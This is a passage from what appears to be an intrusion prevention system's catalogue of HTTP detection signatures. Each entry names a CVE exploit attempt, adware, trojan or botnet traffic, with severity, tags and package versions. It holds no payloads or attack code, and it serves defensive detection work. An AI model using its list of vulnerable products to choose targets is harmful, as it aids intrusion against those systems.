Vulnerability: Zoho-Manageengine-Desktopcentral-Authentication-Bypass-CVE-2021-44515
Description:
Back to top

HTTP_CSH_FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475

About this situation: An attempt to exploit a vulnerability in FortiOS detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, FortiOS, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475
Description:
Back to top

HTTP_CSH_Zabbix-Unsafe-Client-Side-Session-Storage-CVE-2022-23131

About this situation: An attempt to exploit a vulnerability in Zabbix detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Zabbix-Unsafe-Client-Side-Session-Storage-CVE-2022-23131
Description:
Back to top

HTTP_CSR-Hashicorp-Consul-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Hashicorp Consul detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Hashicorp Consul, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: Hashicorp-Consul-Remote-Command-Execution
Description:
Back to top

HTTP_CSR-HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: HPE-Intelligent-Management-Center-Perfselecttask-Expression-Language-Injection
Description:
Back to top

HTTP_CSR-Mailcleaner-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mailcleaner detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mailcleaner, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: Mailcleaner-Remote-Code-Execution
Description:
Back to top

HTTP_CSR-Squid-Proxy-Cachemgr.cgi-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Squid Proxy detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1177-5242
Vulnerability: Squid-Proxy-Cachemgr.cgi-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-2020search

About this situation: 2020Search traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: 2020search
Description:
Back to top

HTTP_CSU-3Com-Airconnect-Web-Interface-Usage

About this situation: Attempt to use 3Com AirConnect Web Interface was detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

HTTP_CSU-3Com-OfficeConnect-ADSL-Wireless-11g-Router-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in 3Com OfficeConnect ADSL Wireless 11g Router detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, 3Com OfficeConnect ADSL Wireless 11g Router, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: 3Com-OfficeConnect-ADSL-Wireless-11g-Router-Authentication-Bypass
Description:
Back to top

HTTP_CSU-427BB-HTML-Injection

About this situation: HTML injection attempt against 427BB
Context: HTTP Request URI
Severity: 7
Tags: Unix, Any Hardware, 427BB, CVE2005, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-427BB-HTML-Injection
Description:
Back to top

HTTP_CSU-A1stats-Cgi-File-Disclosure

About this situation: Attack against vulnerable script
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Drummond Miles A1Stats, CVE2001, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-A1stats-Cgi-File-Disclosure
Description:
Back to top

HTTP_CSU-Ababil-Trojan-Activity-Detected

About this situation: Ababil Trojan activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Ababil-Trojan
Description:
Back to top

HTTP_CSU-ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in ABUS TVIP 20000-21150 detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ABUS TVIP, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion
Description:
Back to top

HTTP_CSU-Abyss-Web-Server-HTTP-Get-BOF

About this situation: Attempt to exploit a heap overflow in Abyss web server
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Abyss Web Server, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Abyss-Web-Server-HTTP-Get-BOF
Description:
Back to top

HTTP_CSU-Acceptable-Use-Of-PHP-In-URI

About this situation: PHP has been used in the URI from an acceptable source.
Context: HTTP Request URI
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1367-5242
Description:
Back to top

HTTP_CSU-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise

About this situation: Detects exploits against Adobe Acrobat ActiveX component
Context: HTTP Request URI
Severity: 7
Tags: Windows, x86, Adobe Reader, Adobe Acrobat, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise
Description:
Back to top

HTTP_CSU-Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Vulnerability: Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767
Description:
Back to top

HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1612-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298
Description:
Back to top

HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298-2

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298
Description:
Back to top

HTTP_CSU-Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961
Description:
Back to top

HTTP_CSU-Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-Adobe-Flash-Player-Security-Bypass-CVE-2015-3102

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2015, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: Adobe-Flash-Player-Security-Bypass-CVE-2015-3102
Description:
Back to top

HTTP_CSU-Advantech-Iview-Deleteztpconfig-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1362-5242
Last changed: sgpkg-ips-1362-5242
Vulnerability: Advantech-Iview-Deleteztpconfig-SQL-Injection
Description:
Back to top

HTTP_CSU-Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech iView detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Vulnerability: Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal
Description:
Back to top

HTTP_CSU-Advantech-Iview-getInventoryReportData-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Advantech-Iview-getInventoryReportData-SQL-Injection
Description:
Back to top

HTTP_CSU-Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal
Description:
Back to top

HTTP_CSU-Advantech-WebAccess-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2012, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Advantech-WebAccess-SQL-Injection
Description:
Back to top

HTTP_CSU-Adware-180sa

About this situation: Adware 180SA activity detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, 180SA, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-180sa
Description:
Back to top

HTTP_CSU-Adware-Adtomi

About this situation: Adware Adtomi traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Adtomi, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Adtomi
Description:
Back to top

HTTP_CSU-Adware-Commonname

About this situation: Adware CommonName traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Commonname
Description:
Back to top

HTTP_CSU-Adware-Exactsearch

About this situation: Adware Exactsearch traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Exactsearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Exactsearch
Description:
Back to top

HTTP_CSU-Adware-Ilookup

About this situation: Adware ILookup traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, ILookup, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Ilookup
Description:
Back to top

HTTP_CSU-Adware-Searchcentrix

About this situation: Adware Searchcentrix traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Searchcentrix, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Adware-Searchcentrix
Description:
Back to top

HTTP_CSU-Adware-Sidesearch

About this situation: Adware SideSearch traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, SideSearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Sidesearch
Description:
Back to top

HTTP_CSU-Adware-Slotch

About this situation: Adware Slotch traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Slotch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Slotch
Description:
Back to top

HTTP_CSU-Adware-Tvmedia

About this situation: Adware TVMedia activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Tvmedia
Description:
Back to top

HTTP_CSU-Ainslot.b-Traffic

About this situation: Ainslot.B traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Ainslot.b-Malware
Description:
Back to top

HTTP_CSU-Aiohttp-Directory-Traversal-CVE-2024-23334

About this situation: An attempt to exploit a vulnerability in aiohttp detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, aiohttp, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Aiohttp-Directory-Traversal-CVE-2024-23334
Description:
Back to top

HTTP_CSU-AirTies-RT-104-Router-Unauthorized-Config-Download

About this situation: An attempt to exploit a vulnerability in AirTies RT 104 router detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, AirTies RT 104 Router, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: AirTies-RT-104-Router-Unauthorized-Config-Download
Description:
Back to top

HTTP_CSU-AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability

About this situation: An attempt to exploit a vulnerability in AirTies RT Series routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, AirTies RT Series Routers, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability
Description:
Back to top

HTTP_CSU-Aldi-Bot-Traffic

About this situation: Aldi Bot traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1258-5242
Vulnerability: Aldi-Bot
Description:
Back to top

HTTP_CSU-Allaire-ColdFusion-cfcache.map-Disclosure

About this situation: Sensitive cfcache.map temporary file requested
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, ColdFusion, CVE2000, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Allaire-ColdFusion-cfcache.map-Disclosure
Description:
Back to top

HTTP_CSU-Allegra-Siteconfigaction-Improper-Access-Control

About this situation: An attempt to exploit a vulnerability in Allegra Allegra detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Allegra, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Vulnerability: Allegra-Siteconfigaction-Improper-Access-Control
Description:
Back to top

HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure

About this situation: An attempt to exploit a vulnerability in Alpha Networks ASL-26555 Wireless Router detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Alpha Networks ASL-26555 Wireless Router, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure
Description:
Back to top

HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Undocumented-API-Call

About this situation: An attempt call an undocumented API in Alpha Networks ASL-26555 Wireless Router detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Alpha Networks ASL-26555 Wireless Router, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure
Description:
Back to top

HTTP_CSU-Altavista-Query-Cgi-File-Disclosure

About this situation: Attack against vulnerable script
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Altavista Search Intranet, CVE2000, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Altavista-Query-Cgi-File-Disclosure
Description:
Back to top

HTTP_CSU-Alueron-Activity

About this situation: Alueron activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Alueron
Description:
Back to top

HTTP_CSU-Amaya-Sendtemp-Pl-File-Disclosure

About this situation: Attack against vulnerable scripts
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Amaya Web development server, CVE2001, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Amaya-Sendtemp-Pl-File-Disclosure
Description:
Back to top

HTTP_CSU-Amlib-NetOPAC-Stack-Remote-Buffer-Overflow

About this situation: An attempt to exploit an Amlib NetOPAC Stack Remote Buffer Overflow vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Amlib NetOPAC, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-787-5211
Vulnerability: Amlib-NetOPAC-Stack-Remote-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Android-Spyeye-Trojan-Traffic

About this situation: Android SpyEye trojan traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Android-Spyeye-Trojan
Description:
Back to top

HTTP_CSU-Android-Stiniter.a-Traffic

About this situation: Android Stiniter.A traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Android-Stiniter.a
Description:
Back to top

HTTP_CSU-Anhttpd-Isapi-Count-Pl-DoS

About this situation: Anhttpd Isapi count.pl Denial of Service
Context: HTTP Request URI
Severity: 7
Tags: Windows, x86, AN-HTTPd, Windows not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-720-5211
Vulnerability: HTTP-Anhttpd-Isapi-Count-Pl-DoS
Description:
Back to top

HTTP_CSU-Apache-Activemq-File-Disclosure

About this situation: An attempt to exploit an Apache ActiveMQ File Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2010, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-760-5211
Vulnerability: Apache-Activemq-File-Disclosure
Description:
Back to top

HTTP_CSU-Apache-Airflow-Experimental-API-Request

About this situation: Request to a deprecated Airflow Experimental API detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Apache Airflow, CVE2020, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Apache-Airflow-Experimental-API-Authentication-Bypass-CVE-2020-13927
Description:
Back to top

HTTP_CSU-Apache-APISIX-Dashboard-Middleware-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Apache APISIX Dashboard detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Any Hardware, Apache APISIX, CVE2021, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Apache-APISIX-Dashboard-Middleware-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS

About this situation: Detected attempt to exploit a vulnerability in Apache APR
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache2, Apache APR, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1345-5242
Vulnerability: Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS
Description:
Back to top

HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing

About this situation: An attempt to exploit a vulnerability in Apache detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-603-5211
Vulnerability: Apache-Apr-Util-IPv6-URI-Parsing
Description:
Back to top

HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing-2

About this situation: An attempt to exploit a vulnerability in Apache detected
Context: HTTP Client Stream
Severity: 7
